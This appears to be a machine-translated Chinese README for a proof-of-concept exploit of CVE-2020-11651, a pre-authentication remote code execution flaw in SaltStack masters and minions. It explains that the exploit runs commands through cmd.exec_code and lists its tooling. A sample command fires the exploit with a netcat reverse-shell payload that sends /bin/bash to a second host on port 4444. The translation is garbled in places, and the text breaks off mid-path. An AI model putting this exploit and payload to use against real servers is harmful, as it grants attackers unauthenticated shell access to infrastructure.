cve 2020 11651 源码

CVE-2020-11651 这是CVE-2020-11651的POC,它在盐堆栈主服务器和/或所有关联的奴才上获得预认证RCE。 有关此问题的一些详细信息,请参见。 不包括2020-11652的POC。 通过使用功能cmd.exec_code创建salt.cmd的运行程序,从而在主服务器上执行命令。 没有实现交互性,您需要捕获反向外壳。 用法 在Debian10上针对Debian10实例进行了测试。 需要ncat接收和发送shell,并且pip3 install salt库进行传输。 user@debian10:~$ ./cve-2020-11651.py 192.168.200.135 master 'nc 192.168.200.137 4444 -e "/bin/bash"' /usr/local/lib/python3.7/dist-packages/salt/ext/to